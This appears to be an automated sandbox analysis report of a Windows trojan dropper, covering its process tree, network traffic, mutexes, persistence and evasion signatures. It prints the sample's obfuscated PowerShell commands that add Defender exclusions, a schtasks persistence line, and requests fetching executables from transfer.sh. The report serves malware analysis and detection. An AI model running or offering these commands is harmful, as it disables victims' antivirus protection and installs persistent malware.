Windows Analysis Report
SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
Analysis ID: 865491
MD5: e1aa70e7ef25fdadd52160e9b9f37b37
SHA1: 7b1538dbde2ad906db1a03dd62604c787adb6579
SHA256: eb9c9eb6572805d03da8b824b1d179301cded34e9c9a71dd1573daa0b2978953
Tags: exe

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
May check the online IP address of the machine
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Drops PE files
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe (PID: 7004 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe MD5: E1AA70E7EF25FDADD52160E9B9F37B37)
    • powershell.exe (PID: 1840 cmdline: powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MonDisc.exe (PID: 6520 cmdline: C:\Users\user\AppData\Roaming\MonDisc.exe MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
      • powershell.exe (PID: 2820 cmdline: powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 4924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
          • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5092 cmdline: schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
        • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LoWin64.exe (PID: 4780 cmdline: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe MD5: 79F329EA2EC0C1BAED4F262F79B48BA5)
  • MonDisc.exe (PID: 4936 cmdline: C:\Users\user\AppData\Roaming\MonDisc.exe MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
  • MonDisc.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
    • powershell.exe (PID: 1500 cmdline: powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 3104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3388 cmdline: schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • MonDisc.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Roaming\MonDisc.exe" MD5: EEF2E49FD27D42237FFB929E1A39FC2D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | ReversingLabs: Detection: 24%
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | Avira: detection malicious, Label: HEUR/AGEN.1315574
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | Avira: detection malicious, Label: HEUR/AGEN.1315574
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | Virustotal: Detection: 55%
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe | Virustotal: Detection: 53%
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | DNS query: name: ip-api.com
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | TCP traffic detected without corresponding DNS query: 185.159.130.81
Source: unknown | TCP traffic detected without corresponding DNS query: 185.159.129.168
Source: unknown | TCP traffic detected without corresponding DNS query: 185.149.146.118
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: global traffic | HTTP traffic detected:
    GET /get/1PRjTr/clip.exe HTTP/1.1
    User-Agent: Monkey
    Host: transfer.sh
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /get/1h9hjM/LoWin64.exe HTTP/1.1
    User-Agent: Monkey
    Host: transfer.sh
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
    Content-Type: application/json
    User-Agent: Monkey
    Host: ip-api.com
Source: global traffic | HTTP traffic detected:
    GET /get/1PRjTr/clip.exe HTTP/1.1
    Content-Type: application/json
    User-Agent: Monkey
    Host: transfer.sh
Source: global traffic | HTTP traffic detected:
    GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
    Content-Type: application/json
    User-Agent: Cat
    Host: ip-api.com
Source: global traffic | HTTP traffic detected:
    GET /get/1h9hjM/LoWin64.exe HTTP/1.1
    Content-Type: application/json
    User-Agent: Monkey
    Host: transfer.sh
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Process created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exe
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe | Process created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\MonDisc.exe "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Users\user\AppData\Roaming\MonDisc.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\MonDisc.exe C:\Users\user\AppData\Roaming\MonDisc.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Local\Temp\MonDiscexe542.tmp
Source: classification engineClassification label: mal80.troj.evad.winEXE@31/21@4/6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeMutant created: \Sessions\1\BaseNamedObjects\Monkey542
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-90edbdfab2e24f1df04e7e57ff349972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\Cat94
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_01
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-8ce3bdfaaeec4f1dec407e57e33a9972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-a0e7bdfa82e84f1dc0447e57cf3e9972}
Source: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-44e6bdfa66e94f1d24457e572b3f9972}
Source: C:\Users\user\AppData\Roaming\MonDisc.exeMutant created: \Sessions\1\BaseNamedObjects\{VXLANG-b0e2bdfa92ed4f1dd0417e57df3b9972}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2100:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3044:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3932:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\MonDisc.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: More than 176 > 100 exports found
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic file information: File size 1382400 > 1048576
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
Source: SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeStatic PE information: section name: _RDATA
Source: LoWin64.exe.0.drStatic PE information: section name: .vxlang
Source: LoWin64.exe.0.drStatic PE information: section name: .mir
Source: MonDisc.exe.0.drStatic PE information: section name: .vxlang
Source: MonDisc.exe.0.drStatic PE information: section name: .mir
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeFile created: C:\Users\user\AppData\Roaming\MonDisc.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\MonDisc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
Source: C:\Users\user\AppData\Roaming\MonDisc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MonDisc
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8EB4 GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetModuleHandleW,IsZoomed,GetWindowTextLengthW,GetDesktopWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetMessageTime,GetSystemDefaultLangID,AnyPopup,GetCurrentProcessId,GetUserDefaultLangID,GetSystemDefaultLangID,GetTopWindow,GetSystemDefaultLangID,GetMessageTime,GetMessageExtraInfo,IsZoomed,GetForegroundWindow,GetDoubleClickTime,GetUserDefaultLangID,GetLargePageMinimum,GetShellWindow,GetCurrentProcessId,GetCommandLineW,GetModuleHandleW,GetCommandLineW,GetCommandLineW,GetCurrentProcessId,GetLargePageMinimum,GetMessageExtraInfo,GetWindowTextLengthW,15_2_00007FF62C8F8EB4
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5101 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetLastActivePopup,IsIconic,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetLastActivePopup,GetDoubleClickTime,IsIconic,15_2_00007FF62C8F5101
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F56BC GetModuleHandleW,GetMessageExtraInfo,AnyPopup,GetWindowTextLengthW,IsZoomed,AnyPopup,GetShellWindow,GetTickCount,GetLastActivePopup,GetTickCount,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetCommandLineW,GetTopWindow,GetForegroundWindow,GetMessageExtraInfo,IsZoomed,GetShellWindow,GetMessageExtraInfo,GetCurrentProcess,GetModuleHandleW,GetTickCount,AnyPopup,IsIconic,GetWindowTextLengthW,GetTopWindow,GetCurrentProcessId,GetTopWindow,GetShellWindow,GetCommandLineW,15_2_00007FF62C8F56BC
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F81BD GetCurrentProcess,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,GetLastActivePopup,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F81BD
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F63BA GetDesktopWindow,GetDoubleClickTime,GetSystemDefaultLangID,GetDoubleClickTime,GetDoubleClickTime,GetDoubleClickTime,GetDesktopWindow,GetWindowTextLengthW,GetDoubleClickTime,GetWindowTextLengthW,GetCommandLineW,GetForegroundWindow,GetTopWindow,GetLargePageMinimum,GetForegroundWindow,GetForegroundWindow,GetTickCount,GetWindowTextLengthW,IsIconic,GetCommandLineW,GetDoubleClickTime,GetUserDefaultLangID,GetDesktopWindow,GetParent,15_2_00007FF62C8F63BA
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8F3E GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,GetForegroundWindow,GetDoubleClickTime,GetCurrentProcessId,GetUserDefaultLangID,GetModuleHandleW,IsZoomed,15_2_00007FF62C8F8F3E
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F512F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F512F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F5117 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,15_2_00007FF62C8F5117
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 15_2_00007FF62C8F8202 GetCurrentProcess,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,15_2_00007FF62C8F8202
